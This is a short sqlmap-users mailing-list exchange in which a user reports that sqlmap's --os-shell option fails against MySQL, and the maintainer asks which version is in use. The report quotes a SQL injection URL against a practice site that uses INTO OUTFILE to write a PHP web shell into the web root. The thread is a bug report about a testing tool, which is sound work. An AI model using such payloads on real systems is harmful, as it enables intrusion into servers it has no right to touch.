Which revision/version of sqlmap do you use? There has been a related patch a month ago. Will check tomorrow.

Bye

On Sun, Jul 5, 2015 at 12:33 AM, Danux <[email protected]> wrote:

> Hello list, there is an issue with sqlmap when using the --os-shell option
> in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>
> Description:
>
> A specific PAYLOAD (see below) used to upload a web shell will create an
> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
> attempt will fail with an "already exist" error and therefore not able
> to upload the web shell.
>
> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>
> By default, MySQL will throw an error if the file already exists:
>
> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>
> Solution:
>
> 1. Change the web shell name for every new PAYLOAD attempt, at least when
> using the --os-shell option
> 2. Fix the PAYLOAD causing problems.
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm
_______________________________________________ sqlmap-users mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/sqlmap-users
